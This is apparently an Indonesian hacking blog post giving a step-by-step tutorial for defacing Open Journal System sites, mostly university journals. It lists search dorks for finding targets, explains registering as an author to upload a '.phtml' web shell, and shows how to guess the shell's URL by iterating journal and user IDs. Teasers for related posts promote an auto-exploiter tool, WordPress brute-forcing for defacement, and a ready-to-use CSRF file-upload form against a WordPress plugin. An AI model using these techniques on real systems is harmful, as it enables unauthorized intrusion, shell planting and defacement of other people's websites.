Skip to main content

Deface Open Journal System

Hai guys ...
ketemu lagi sama gw :v
kali ini gw akan bawain tutor depes Open Journal System yg rata2 web yg pake ojs itu web universitas dan biasanya subdomainnya banyak jadi bisa mass depes :v

langsung sadja

siapin shell nya (kalo blom punya donlot di sini)

Dork :
  • index.php/index/user/register intext:journals site:co.li :v
  • inurl:/files/journals intext:ojs site:co.li
  • index of /files/jornals intext:ojs
kembangin lagi guys :v

nah setelah kita dorking...kita cek web kita vuln apa kagak...
tambahin exploit /files di blakang domennya
contoh: http://site.co.uk/files
kalo vuln muncul kek gini
kalo muncul forbidden...bisa vuln bisa kagak :v
faktor face juga sih awokwaowkaowk

habis itu kita cari form register nya
register dg nama, alamat, nomer tlp yg asli biar gampang keciduk :v
just kidding :v
centang author ya biar bisa up file
setelah itu klik make submissiom/new submission
kalian centang smua itu nya....kolom nya kalian isi apa aja terserah :v
trus klik pencetan ijo di bawah itu
habis itu kalian uplod shell kalian guys...tapi format nya phtml ya....
contoh : shell.phtml
setelah di uplod shell nya akan muncul kek gini
nah di sini kita tinggal cari shell nya...
gimana cari nya?
misal nya nama file gw 408-1206-1-SM.phtml
nah 408 itu user id gw
tinggal kita cari
http://site.co.uk/files/journals/1/articles/user_id_kalian/submission/original/nama_file_kalian.phtml
contoh:
http://site.co.uk/files/journals/1/articles/408/submission/original/408-1206-1-SM.phtml

kalo habis angka journals 1 ga bisa
coba ganti angka nya dari 1 sampe 69 dan seterus nya :v

kalo udah ke buka shell nya...
terserah mau kalian apain tuh web nya
tapi kalo mau tebas index usahain backup dulu ya
soal nya gw sering dapet email dari web developer nya :v

happy defacing ^_^
Share yak :v

Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...